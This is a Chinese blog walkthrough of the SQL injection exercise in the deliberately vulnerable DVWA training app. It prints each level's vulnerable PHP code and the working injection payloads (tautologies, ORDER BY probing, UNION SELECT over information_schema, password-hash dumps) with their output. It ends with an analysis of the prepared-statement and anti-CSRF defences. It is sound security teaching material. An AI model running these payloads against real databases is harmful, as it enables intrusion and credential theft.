【DVWA1.10】SQL Injection通关笔记

最新推荐文章于 2022-10-11 10:00:32 发布
最新推荐文章于 2022-10-11 10:00:32 发布
阅读量345 收藏
点赞数
分类专栏: dvwa1.10
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/112001754
版权

php 安全

等级

Security Level: low

<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

    mysqli_close($GLOBALS["___mysqli_ston"]); 
} 

?>

没有对传入的参数id进行任何过滤操作,直接注入!
输入:

'or 1='1

回显:

ID: 'or 1='1
First name: admin
Surname: admin
ID: 'or 1='1
First name: Gordon
Surname: Brown
ID: 'or 1='1
First name: Hack
Surname: Me
ID: 'or 1='1
First name: Pablo
Surname: Picasso
ID: 'or 1='1
First name: Bob
Surname: Smith

拿到了所有的用户名,我们试着拿密码,先看看字段多少
输入:

1’order by 3#

回显:

ID: 1'order by 2#
First name: admin
Surname: admin

输入:

1’order by 3#

回显:

Unknown column '3' in 'order clause'

说明字段数为2,那我们开始破表名。
输入:

-1’union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

回显:

ID: -1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
First name: 1
Surname: guestbook,users

我们看看uers表里面的列
输入:

-1’union select 1,group_concat(column_name) from information_schema.columns where table_name=‘user’#

回显:

ID: -1'union select 1,group_concat(column_name) from information_schema.columns where table_name='user'#
First name: 1
Surname: Host,User,Password,Select_priv,......

爆出的列名巨多,对我们来说没用,我们就查查密码
输入:

-1’union select 1,group_concat(password) from users#

回显:

ID: -1'union select 1,group_concat(password) from users#
First name: 1
Surname: 202cb962ac59075b964b07152d234b70,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

这些都是md5加密后的密码,解出来就是明文了

Security Level: medium

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

} 

// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?>

可以看到,对id参数进行了mysqli_real_escape_string函数的过滤,我们先来看看该函数的说明
在这里插入图片描述
也就是说明'给转义了,但我们仔细看看源码,会发现变量id在语句处并没有用单引号括着,这也会导致数字型注入。
什么是数字型注入?

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

测试步骤:

(1) 加单引号,URL:www.text.com/text.php?id=3’

对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;

(2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1

对应的sql:select * from table where id=3and 1=1 语句执行正常,与原始页面如任何差异;

(3) 加and 1=2URL:www.text.com/text.php?id=3 and 1=2

对应的sql:select * from table where id=3 and 1=2 语句可以正常执行,但是无法查询出结果,所以返回数据与原始网页存在差异

如果满足以上三点,则可以判断该URL存在数字型注入。

我们这里个环境恰好就是如此,这样我们就不需要'来完成注入,那我们可以试试进行操作。在dvwa1.10版本medium难度的sql注入,input框会变成select框,提交方式也变成了POST,我们可以用burpsuite来完成接下来的操作!
在这里插入图片描述
burpsuite抓个包看看
在这里插入图片描述
我们可以按Ctrl+R来把包放到Repeater模块来进行测试,以下过程不给予截图,只描述简单过程。
提交:

id=-1 union select group_concat(user),group_concat(password) from users#&Submit=Submit

回显:

ID: -1 union select group_concat(user),group_concat(password) from users#
First name: admin,gordonb,1337,pablo,smithy
Surname: 202cb962ac59075b964b07152d234b70,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

Security Level: high

<?php 

if( isset( $_SESSION [ 'id' ] ) ) { 
    // Get input 
    $id = $_SESSION[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
} 

?>

high难度题目也出现了变化,题目中的提交框都没了,只留下了一段a标签
在这里插入图片描述
标签内容也可以看看

<a href="#" onclick="javascript:popUp('session-input.php');return false;">here to change your ID</a>

popUp说明这是一个弹窗,我们点击这个标签看看
在这里插入图片描述
弹出来一个小窗口,发现里面有提交页面,从源码里面看,注入点在SESSION里面,该页面提交的数据多半便是用来设置SESSION的,但是还是没对id进行任何过滤,我们可以尝试注入。
直接在表单中提交:

-1’union select group_concat(user),2 from users#

在这里插入图片描述
发现弹窗里面并没有输出回显,只弹出了刚刚输入的语句,但是回看主页面,发现已经注入成功并回显了
在这里插入图片描述

Security Level: impossible

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $id = $_GET[ 'id' ]; 

    // Was a number entered? 
    if(is_numeric( $id )) { 
        // Check the database 
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
        $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
        $data->execute(); 
        $row = $data->fetch(); 

        // Make sure only 1 result is returned 
        if( $data->rowCount() == 1 ) { 
            // Get values 
            $first = $row[ 'first_name' ]; 
            $last  = $row[ 'last_name' ]; 

            // Feedback for end user 
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
        } 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

让我们先来看看官方对于impossible难度的介绍

Impossible - This level should besecure against all vulnerabilities. It is used to compare the vulnerable source code to the secure source code.
Prior to DVWA v1.9, this level was known as ‘high’.

译:

不可能-此级别应针对所有漏洞进行保护。它用于比较易受攻击的源代码和安全的源代码。在dvwav1.9之前,这个级别被称为“高”。

所以我们不要求去攻破它,但是我们可以学习它是如何去进行防范的。
首先是Check Anti-CSRF token,它是为了防止CSRF攻击的,对于CSRF(跨站点请求伪造),有兴趣的可以自己查阅。
这里推荐一篇大佬的文章,大佬的描述十分详细:https://blog.csdn.net/weixin_42555985/article/details/88028776
我这里也会对大佬文章内容进行精简,把要点列出来
CSRF攻击的一般是由服务端解决,应对CSRF的方法有:

  • 尽量使用POST,限制GET
  • 浏览器Cookie策略
  • 加验证码
  • Referer Check ,例如:防止图片盗链
  • Anti CSRF Token

这里就是用的最后一种防范方式
使用Token有2种方式:

  1. 用设备号/设备mac地址作为Token
  2. 用session值作为Token用session值作为Token

Token的好处是服务端不需要存储相应信息。
大概的流程是这样的:

  1. 客户端使用用户名跟密码请求登录.
  2. 服务端收到请求,去验证用户名与密码
  3. 验证成功后,服务端会签发一个 Token,再把这个 Token 发送给客户端
  4. 客户端收到 Token 以后可以把它存储起来,比如放在 Cookie 里或者 Local Storage 里
  5. 客户端每次向服务端请求资源的时候需要带着服务端签发的 Token
  6. 服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据
  7. 当然,如果Token被不怀好意的人从中间获取到该信息时,也容易被利用,非法获取数据。 想增强安全性,一般可以在服务端生成时配合时间戳,服务端在接收到client发来带token的信息时,先检测token的时间戳信息,如果该时间戳在超过某个时间点时,就认为过期,需要重新获取。

Token一般用在两个地方:

  1. 防止表单重复提交:服务器端第一次验证相同过后,会将session中的Token值更新。若用户重复提交,第二次的验证判断将失败,因为用户提交的表单中的Token没变,但服务器端session中Token已经改变了。
  2. anti csrf攻击(跨站点请求伪造):服务器端会对Token值进行验证,判断是否和session中的Token值相等。若相等,则可以证明请求有效,不是伪造的。

那我们来看看代码:

**// Anti-CSRF
generateSessionToken();

login界面与该题目界面都有生成Token,这个函数在dvwa/includes/dvwaPhpIds.inc.php中

function generateSessionToken() {  # Generate a brand new (CSRF) token
        if( isset( $_SESSION[ 'session_token' ] ) ) {
                destroySessionToken();
        }
        $_SESSION[ 'session_token' ] = md5( uniqid() );
}

先来看看uniqid()这个函数
在这里插入图片描述
这个就是时间戳然后md5加密后生成的token,验证就是在impossible.php中

checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

请注意:要避免"加token但不进行校验"的情况。在session中增加了token,但服务端没有对token进行验证,那根本起不到防范的作用。
代码进行到最后就会进行一次签发Token,所以每次提交页面都需要核对Token,有效防止CSRF攻击。
再看看sql语句方面:

$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
$data->bindParam( ':id', $id, PDO::PARAM_INT ); 
$data->execute(); 
$row = $data->fetch();

这个就是sql的预编译,预编译语句的优势在于归纳为:一次编译、多次运行,省去了解析优化等过程。预编译语句能防止sql注入。mysql4.1以后支持预编译。.
有关预编译可以去看看这篇说明:https://www.runoob.com/php/pdo-prepare.html
最后一处防御:

if( $data->rowCount() == 1 )

还对返回的结果进行判断,只能返回一条。
总的来说,防御十分强大,至少对现在的我来讲…

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA1.10_CSRF
whime
07-11 329
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签中.
DVWA 共12关通关笔记
09-12
DVWA 共12关通关笔记DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
DVWA1.10-SQL注入
uh_eng的博客
07-16 379
low 字符型注入 select first_name,last_name from users where user_id='1'与select user_id from users where user_id='1asdfasdf'查询结果一致。 猜测原因应该是由于表中的user_id字段类型为int,所以在与字符串类型比较时会进行转换,与PHP类似,在转换过程中碰到非数字字符时转换终止,这就导致了上面的查询中where后面的效果相同。 获取MySQL数据库信息 如果注入类型为字符型,需要解决末尾的’闭
DVWA1.10-Sql Injection
whime
07-11 148
LOW LOW级别没有对输入参数进行任何检查过滤,直接插入sql语句查询,存在很大的注入漏洞。 首先依次使用以下语句可以判断为字符型注入。 输入1 输入1’ and ‘1’=‘1 输入1’ and ‘1’=‘2,查询失败,由此可以说明存在字符型注入。 使用union猜解sql查询语句中的字段数 1’ union select 1,2#,使用其他语句如1‘ union select 1#和1’ union select 1,2,3#都报错The used SELECT statements have
DVWA-v1.10-文件包含
-
03-20 4596
DVWA v1.10搭建在linux系统上。 进来之后看到 可以看到三个文件fil1.php、file2.php、file3.php 同时还给出三个链接:
DVWA 1.10版本Brute Force(high)
monsterdouble的博客
06-25 712
low和mid等级直接使用burpsuite暴力破解,high等级先抓包发现有token认证机制,需要先获取token,然后用token加上用户密码验证身份。以下为python暴力破解代码import re import requests url='http://127.0.0.1:8000/vulnerabilities/brute/' header={'Host': '127.0.0.1:...
dvwa靶场通关sql injection
07-19
dvwa靶场通关sql injection
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
在实际操作中,你可以通过PHPStudy建立环境,然后部署DVWASQL-li-labs,逐一攻破每一个安全挑战,这将有助于提升对Web安全的意识和应对能力。 总结一下,这个压缩包提供了一套完整的Web安全学习和实践环境,包括...
DVWA最新版
03-23
DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版
DVWA全级别教程
10-26
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
DVWA1.10-XSS
uh_eng的博客
07-26 203
反射型 low 在输入框里填入的内容会通过GET请求的方式发往后端,同时后端会根据输入的内容拼接一个页面,把输入的内容显示给用户。 在输入框里输入<script>alert('xss');</script>点击提交会发现弹出弹窗。验证了漏洞存在。不过xss可不是用来给访问者弹窗的,接下来继续利用该漏洞窃取访问者的cookie。 首先编写一段xss脚本放在攻击者服务器上,其作用是读取当前的cookie和host信息,并提交到攻击者的服务器上。 //文件名为xss_cookie.js v
DVWA笔记(一)SQL InjectionSQL注入)
weixin_45868644的博客
08-20 403
文章目录SQL注入原理前言1.注入流程2.源码分析2.复现过程总结 SQL注入原理 Web应用程序对用户输入的合法性没有判断或者过滤不严,用户在输入的字符串之中注入SQL指令,导致这些注入进去的恶意指令被数据库误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 前言 重点:information_schema 在学习SQL注入漏洞之前,先学习一个相关的知识点。在MySQL 5.0版本之后,MySQL默认在数据库中存放一个“information_schema”的数据库,在该库中,需要记住三个表名,分别
DVWA-SQL Injection级别通关详解
m0_60884805的博客
10-11 1225
information_schema 是 mySQL 自带的一张表,这张数据表保存了 MySQL 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。输入到数字3时有了变化,所以此处的select查询语句中查询的字段有2个有2列。
DVWASQL InjectionSQL 注入)通关教程
weixin_30527551的博客
07-28 806
日期:2019-07-28 20:43:48 更新: 作者:Bay0net 介绍: 0x00、基本信息 关于 mysql 相关的注入,传送门。 SQL 注入漏洞之 mysql - Bay0net - 博客园 0x01、Low Security Level 查看源码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { ...
DVWA 通关sql injection
干铮的博客
07-28 438
1.LOW 看见页面有回显我们可以用联合查询的方法 1.判断列数 ?id=1 order by 1 2.判断显示位置 ?id=1' and 1=2 union select 1,2 --+ 3.查看数据库中敏感信息 ?id=1' and 1=2 union select database(),version() --+ 4.查询数据库名 ?id=1' and1=2 union select database() --+ 5.查询表名 ?id=1' and 1.
DVWA】1.SQL Injection通关记录(Low)
Zichel77的博客
10-21 267
Security Level:Low 1.判断注入点及注入类型 看到的是一个输入框,输入数字有对应返回值 所以这里应该是一个注入点,使用恒真恒假式来尝试一下 输入1' and '1'='2返回无结果,确定此处为注入点 再用恒真式来显示所有结果 输入1' or '1'='1('1'='1'恒真,中间使用or连接则整个查询式子恒真,即可返回所有查询结果) 2.判断数据库中的字段数 ...
DVWA1.10_Brute_Force
whime
07-11 364
low等级 查看源代码可知,在php脚本中只检查了Login变量是否设置,没有对user,password参数进行过滤,存在注入漏洞。由于password参数进行了md5散列,并且只有结果集只有一行才可以通过验证,所以只能对用户名进行注入。如 ’ or 1=1 limit 1,1# 使用Burp Suite进行爆破,抓包选择爆破的参数,选择Kali 自带的字典rockyou.txt 进行爆破,得出密码为password。 medium等级 medium等级使用了mysqli_real_escape_s.
dvwa sql injection
最新发布
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值